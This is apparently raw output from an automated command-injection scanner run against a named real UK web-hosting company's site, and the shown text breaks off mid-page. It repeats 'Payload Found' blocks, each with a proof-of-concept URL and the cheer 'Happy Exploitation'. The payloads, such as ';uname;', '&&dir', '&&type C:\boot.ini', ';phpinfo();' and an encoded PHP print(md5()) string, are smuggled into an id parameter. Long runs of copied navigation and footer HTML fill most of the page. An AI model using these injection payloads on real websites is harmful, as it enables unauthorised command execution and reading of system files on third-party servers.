[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li><a href="/hosting/1-click-install-hosting.php">View 1 Click Installs</a> <ul> <li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC: https://www.squirrelhosting.co.uk/ho...2529%257D%253B[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %253B%2524%257B%2540print%2528md5%2528%2522zigoo0% 2522%2529%2529%257D%253B
[!] Code Snippet: <div id="footer"> <div id="ninesixzero"> <div id="footerblockleftone"> <h6 class="footerheadersix">Domains & UK Hosting</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/domain-names/domain-name-registration.php">Domain Names</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/linux-hosting-packages.php">Web Hosting</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/virtual-private-servers/order-vps.php">Virtual Servers</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact us</a></li></ul> </div><div id="footerblocklefttwo"> <h6 class="footerheadersix">Resources</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/1-click-install-hosting.php">Free Scripts & 1 Click Installs</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog.php" >Hosting Blog</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms and Conditions</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a></li></ul> </div><div id="footerblockleftthree"><h6 class="footerheadersix">Social</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.facebook.com/SquirrelHosting">Facebook</a></li><li class="footerli"><a href="https://twitter.com/squirrelhosting">Twitter</a></li><li class="footerli"><a href="https://plus.google.com/111473460656603282963">Find us on Google+</a></li></ul></div><div id="footerblocklast"> <h6 class="footerheadersix">Additional Information</h6> <ul class="footerul"> <li class="footerlinobullet"> <span class="cards"><img id="creditcardsfooter" src="/img_trans.png" height="1" width="1" alt="Payment Cards Accepted"/></span></a></li><li class="footerlinobullet"> <table class="veritable" cellspacing=0 cellpadding=0 title="CLICK TO VERIFY: This site uses a GlobalSign SSL Certificate to secure your personal information." > <tr> <td align="center"><span id="ss_img_wrapper_gmogs_image_125-50_en_white"><a href="https://www.globalsign.co.uk/" target=_blank title="GlobalSign Site Seal" rel="nofollow"><img alt="SSL" border=0 id="ss_img" src="//seal.globalsign.com/SiteSeal/images/gmogs_image_125-50_en_white.png"></a></span><script defer type="text/javascript" src="//seal.globalsign.com/SiteSeal/gmogs_image_125-50_en_white.js"></script></td></tr></table> </li></ul> </div></div></div><div id="bottomfooter"> <div id="ninesixzero"> <div id="footerbottomleft">© Copyright 2014 | Squirrel Hosting Limited<br/> Company Number 9031308</div><div id="footerbottomright"> <a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact</a> | <a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a> | <a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms & Conditions</a></div><div id="footerbottomcenter"></div></div></div>[*] POC: https://www.squirrelhosting.co.uk/ho...2529%257D%253B[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;uname;
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC: https://www.squirrelhosting.co.uk/ho...p?id=94;uname;[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;uname;
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li> <label for="oneclick" class="toggle-sub" onClick="">View 1 Click Installs <span class="toggleright">►</span></label> <input type="checkbox" id="oneclick" class="sub-nav-check"/> <ul id="fof-sub" class="sub-nav"> <li class="sub-heading"> <label for="oneclick" class="toggle" onClick="" title="Back">◄</label> </li><li><a href="/hosting/1-click-install-hosting.php">1 Click installs overview</a></li><li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC: https://www.squirrelhosting.co.uk/ho...p?id=94;uname;[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;uname;
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting</a>[*] POC: https://www.squirrelhosting.co.uk/ho...p?id=94;uname;[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;uname;
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC: https://www.squirrelhosting.co.uk/ho...p?id=94;uname;[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;uname;
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li><a href="/hosting/1-click-install-hosting.php">View 1 Click Installs</a> <ul> <li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC: https://www.squirrelhosting.co.uk/ho...p?id=94;uname;[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;uname;
[!] Code Snippet: <div id="footer"> <div id="ninesixzero"> <div id="footerblockleftone"> <h6 class="footerheadersix">Domains & UK Hosting</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/domain-names/domain-name-registration.php">Domain Names</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/linux-hosting-packages.php">Web Hosting</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/virtual-private-servers/order-vps.php">Virtual Servers</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact us</a></li></ul> </div><div id="footerblocklefttwo"> <h6 class="footerheadersix">Resources</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/1-click-install-hosting.php">Free Scripts & 1 Click Installs</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog.php" >Hosting Blog</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms and Conditions</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a></li></ul> </div><div id="footerblockleftthree"><h6 class="footerheadersix">Social</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.facebook.com/SquirrelHosting">Facebook</a></li><li class="footerli"><a href="https://twitter.com/squirrelhosting">Twitter</a></li><li class="footerli"><a href="https://plus.google.com/111473460656603282963">Find us on Google+</a></li></ul></div><div id="footerblocklast"> <h6 class="footerheadersix">Additional Information</h6> <ul class="footerul"> <li class="footerlinobullet"> <span class="cards"><img id="creditcardsfooter" src="/img_trans.png" height="1" width="1" alt="Payment Cards Accepted"/></span></a></li><li class="footerlinobullet"> <table class="veritable" cellspacing=0 cellpadding=0 title="CLICK TO VERIFY: This site uses a GlobalSign SSL Certificate to secure your personal information." > <tr> <td align="center"><span id="ss_img_wrapper_gmogs_image_125-50_en_white"><a href="https://www.globalsign.co.uk/" target=_blank title="GlobalSign Site Seal" rel="nofollow"><img alt="SSL" border=0 id="ss_img" src="//seal.globalsign.com/SiteSeal/images/gmogs_image_125-50_en_white.png"></a></span><script defer type="text/javascript" src="//seal.globalsign.com/SiteSeal/gmogs_image_125-50_en_white.js"></script></td></tr></table> </li></ul> </div></div></div><div id="bottomfooter"> <div id="ninesixzero"> <div id="footerbottomleft">© Copyright 2014 | Squirrel Hosting Limited<br/> Company Number 9031308</div><div id="footerbottomright"> <a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact</a> | <a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a> | <a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms & Conditions</a></div><div id="footerbottomcenter"></div></div></div>[*] POC: https://www.squirrelhosting.co.uk/ho...p?id=94;uname;[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: &&dir
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC: https://www.squirrelhosting.co.uk/ho...php?id=94&&dir[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: &&dir
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li> <label for="oneclick" class="toggle-sub" onClick="">View 1 Click Installs <span class="toggleright">►</span></label> <input type="checkbox" id="oneclick" class="sub-nav-check"/> <ul id="fof-sub" class="sub-nav"> <li class="sub-heading"> <label for="oneclick" class="toggle" onClick="" title="Back">◄</label> </li><li><a href="/hosting/1-click-install-hosting.php">1 Click installs overview</a></li><li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC: https://www.squirrelhosting.co.uk/ho...php?id=94&&dir[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: &&dir
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting</a>[*] POC: https://www.squirrelhosting.co.uk/ho...php?id=94&&dir[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: &&dir
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC: https://www.squirrelhosting.co.uk/ho...php?id=94&&dir[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: &&dir
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li><a href="/hosting/1-click-install-hosting.php">View 1 Click Installs</a> <ul> <li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC: https://www.squirrelhosting.co.uk/ho...php?id=94&&dir[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: &&dir
[!] Code Snippet: <div id="footer"> <div id="ninesixzero"> <div id="footerblockleftone"> <h6 class="footerheadersix">Domains & UK Hosting</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/domain-names/domain-name-registration.php">Domain Names</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/linux-hosting-packages.php">Web Hosting</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/virtual-private-servers/order-vps.php">Virtual Servers</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact us</a></li></ul> </div><div id="footerblocklefttwo"> <h6 class="footerheadersix">Resources</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/1-click-install-hosting.php">Free Scripts & 1 Click Installs</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog.php" >Hosting Blog</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms and Conditions</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a></li></ul> </div><div id="footerblockleftthree"><h6 class="footerheadersix">Social</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.facebook.com/SquirrelHosting">Facebook</a></li><li class="footerli"><a href="https://twitter.com/squirrelhosting">Twitter</a></li><li class="footerli"><a href="https://plus.google.com/111473460656603282963">Find us on Google+</a></li></ul></div><div id="footerblocklast"> <h6 class="footerheadersix">Additional Information</h6> <ul class="footerul"> <li class="footerlinobullet"> <span class="cards"><img id="creditcardsfooter" src="/img_trans.png" height="1" width="1" alt="Payment Cards Accepted"/></span></a></li><li class="footerlinobullet"> <table class="veritable" cellspacing=0 cellpadding=0 title="CLICK TO VERIFY: This site uses a GlobalSign SSL Certificate to secure your personal information." > <tr> <td align="center"><span id="ss_img_wrapper_gmogs_image_125-50_en_white"><a href="https://www.globalsign.co.uk/" target=_blank title="GlobalSign Site Seal" rel="nofollow"><img alt="SSL" border=0 id="ss_img" src="//seal.globalsign.com/SiteSeal/images/gmogs_image_125-50_en_white.png"></a></span><script defer type="text/javascript" src="//seal.globalsign.com/SiteSeal/gmogs_image_125-50_en_white.js"></script></td></tr></table> </li></ul> </div></div></div><div id="bottomfooter"> <div id="ninesixzero"> <div id="footerbottomleft">© Copyright 2014 | Squirrel Hosting Limited<br/> Company Number 9031308</div><div id="footerbottomright"> <a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact</a> | <a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a> | <a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms & Conditions</a></div><div id="footerbottomcenter"></div></div></div>[*] POC: https://www.squirrelhosting.co.uk/ho...php?id=94&&dir[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: &&type C:\boot.ini
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC: https://www.squirrelhosting.co.uk/ho...hp?id=94&&type C:\boot.ini[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: &&type C:\boot.ini
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li> <label for="oneclick" class="toggle-sub" onClick="">View 1 Click Installs <span class="toggleright">►</span></label> <input type="checkbox" id="oneclick" class="sub-nav-check"/> <ul id="fof-sub" class="sub-nav"> <li class="sub-heading"> <label for="oneclick" class="toggle" onClick="" title="Back">◄</label> </li><li><a href="/hosting/1-click-install-hosting.php">1 Click installs overview</a></li><li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC: https://www.squirrelhosting.co.uk/ho...hp?id=94&&type C:\boot.ini[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: &&type C:\boot.ini
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting</a>[*] POC: https://www.squirrelhosting.co.uk/ho...hp?id=94&&type C:\boot.ini[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: &&type C:\boot.ini
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC: https://www.squirrelhosting.co.uk/ho...hp?id=94&&type C:\boot.ini[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: &&type C:\boot.ini
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li><a href="/hosting/1-click-install-hosting.php">View 1 Click Installs</a> <ul> <li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC: https://www.squirrelhosting.co.uk/ho...hp?id=94&&type C:\boot.ini[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: &&type C:\boot.ini
[!] Code Snippet: <div id="footer"> <div id="ninesixzero"> <div id="footerblockleftone"> <h6 class="footerheadersix">Domains & UK Hosting</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/domain-names/domain-name-registration.php">Domain Names</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/linux-hosting-packages.php">Web Hosting</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/virtual-private-servers/order-vps.php">Virtual Servers</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact us</a></li></ul> </div><div id="footerblocklefttwo"> <h6 class="footerheadersix">Resources</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/1-click-install-hosting.php">Free Scripts & 1 Click Installs</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog.php" >Hosting Blog</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms and Conditions</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a></li></ul> </div><div id="footerblockleftthree"><h6 class="footerheadersix">Social</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.facebook.com/SquirrelHosting">Facebook</a></li><li class="footerli"><a href="https://twitter.com/squirrelhosting">Twitter</a></li><li class="footerli"><a href="https://plus.google.com/111473460656603282963">Find us on Google+</a></li></ul></div><div id="footerblocklast"> <h6 class="footerheadersix">Additional Information</h6> <ul class="footerul"> <li class="footerlinobullet"> <span class="cards"><img id="creditcardsfooter" src="/img_trans.png" height="1" width="1" alt="Payment Cards Accepted"/></span></a></li><li class="footerlinobullet"> <table class="veritable" cellspacing=0 cellpadding=0 title="CLICK TO VERIFY: This site uses a GlobalSign SSL Certificate to secure your personal information." > <tr> <td align="center"><span id="ss_img_wrapper_gmogs_image_125-50_en_white"><a href="https://www.globalsign.co.uk/" target=_blank title="GlobalSign Site Seal" rel="nofollow"><img alt="SSL" border=0 id="ss_img" src="//seal.globalsign.com/SiteSeal/images/gmogs_image_125-50_en_white.png"></a></span><script defer type="text/javascript" src="//seal.globalsign.com/SiteSeal/gmogs_image_125-50_en_white.js"></script></td></tr></table> </li></ul> </div></div></div><div id="bottomfooter"> <div id="ninesixzero"> <div id="footerbottomleft">© Copyright 2014 | Squirrel Hosting Limited<br/> Company Number 9031308</div><div id="footerbottomright"> <a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact</a> | <a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a> | <a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms & Conditions</a></div><div id="footerbottomcenter"></div></div></div>[*] POC: https://www.squirrelhosting.co.uk/ho...hp?id=94&&type C:\boot.ini[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;phpinfo();
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC: https://www.squirrelhosting.co.uk/ho...=94;phpinfo();[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;phpinfo();
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li> <label for="oneclick" class="toggle-sub" onClick="">View 1 Click Installs <span class="toggleright">►</span></label> <input type="checkbox" id="oneclick" class="sub-nav-check"/> <ul id="fof-sub" class="sub-nav"> <li class="sub-heading"> <label for="oneclick" class="toggle" onClick="" title="Back">◄</label> </li><li><a href="/hosting/1-click-install-hosting.php">1 Click installs overview</a></li><li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC: https://www.squirrelhosting.co.uk/ho...=94;phpinfo();[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;phpinfo();
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting</a>[*] POC: https://www.squirrelhosting.co.uk/ho...=94;phpinfo();[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;phpinfo();
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC: https://www.squirrelhosting.co.uk/ho...=94;phpinfo();[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;phpinfo();
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li><a href="/hosting/1-click-install-hosting.php">View 1 Click Installs</a> <ul> <li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC: https://www.squirrelhosting.co.uk/ho...=94;phpinfo();[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;phpinfo();
[!] Code Snippet: <div id="footer"> <div id="ninesixzero"> <div id="footerblockleftone"> <h6 class="footerheadersix">Domains & UK Hosting</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/domain-names/domain-name-registration.php">Domain Names</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/linux-hosting-packages.php">Web Hosting</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/virtual-private-servers/order-vps.php">Virtual Servers</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact us</a></li></ul> </div><div id="footerblocklefttwo"> <h6 class="footerheadersix">Resources</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/1-click-install-hosting.php">Free Scripts & 1 Click Installs</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog.php" >Hosting Blog</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms and Conditions</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a></li></ul> </div><div id="footerblockleftthree"><h6 class="footerheadersix">Social</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.facebook.com/SquirrelHosting">Facebook</a></li><li class="footerli"><a href="https://twitter.com/squirrelhosting">Twitter</a></li><li class="footerli"><a href="https://plus.google.com/111473460656603282963">Find us on Google+</a></li></ul></div><div id="footerblocklast"> <h6 class="footerheadersix">Additional Information</h6> <ul class="footerul"> <li class="footerlinobullet"> <span class="cards"><img id="creditcardsfooter" src="/img_trans.png" height="1" width="1" alt="Payment Cards Accepted"/></span></a></li><li class="footerlinobullet"> <table class="veritable" cellspacing=0 cellpadding=0 title="CLICK TO VERIFY: This site uses a GlobalSign SSL Certificate to secure your personal information." > <tr> <td align="center"><span id="ss_img_wrapper_gmogs_image_125-50_en_white"><a href="https://www.globalsign.co.uk/" target=_blank title="GlobalSign Site Seal" rel="nofollow"><img alt="SSL" border=0 id="ss_img" src="//seal.globalsign.com/SiteSeal/images/gmogs_image_125-50_en_white.png"></a></span><script defer type="text/javascript" src="//seal.globalsign.com/SiteSeal/gmogs_image_125-50_en_white.js"></script></td></tr></table> </li></ul> </div></div></div><div id="bottomfooter"> <div id="ninesixzero"> <div id="footerbottomleft">© Copyright 2014 | Squirrel Hosting Limited<br/> Company Number 9031308</div><div id="footerbottomright"> <a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact</a> | <a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a> | <a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms & Conditions</a></div><div id="footerbottomcenter"></div></div></div>[*] POC: https://www.squirrelhosting.co.uk/ho...=94;phpinfo();[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;phpinfo
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC: https://www.squirrelhosting.co.uk/ho...?id=94;phpinfo[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;phpinfo
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li> <label for="oneclick" class="toggle-sub" onClick="">View 1 Click Installs <span class="toggleright">►</span></label> <input type="checkbox" id="oneclick" class="sub-nav-check"/> <ul id="fof-sub" class="sub-nav"> <li class="sub-heading"> <label for="oneclick" class="toggle" onClick="" title="Back">◄</label> </li><li><a href="/hosting/1-click-install-hosting.php">1 Click installs overview</a></li><li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 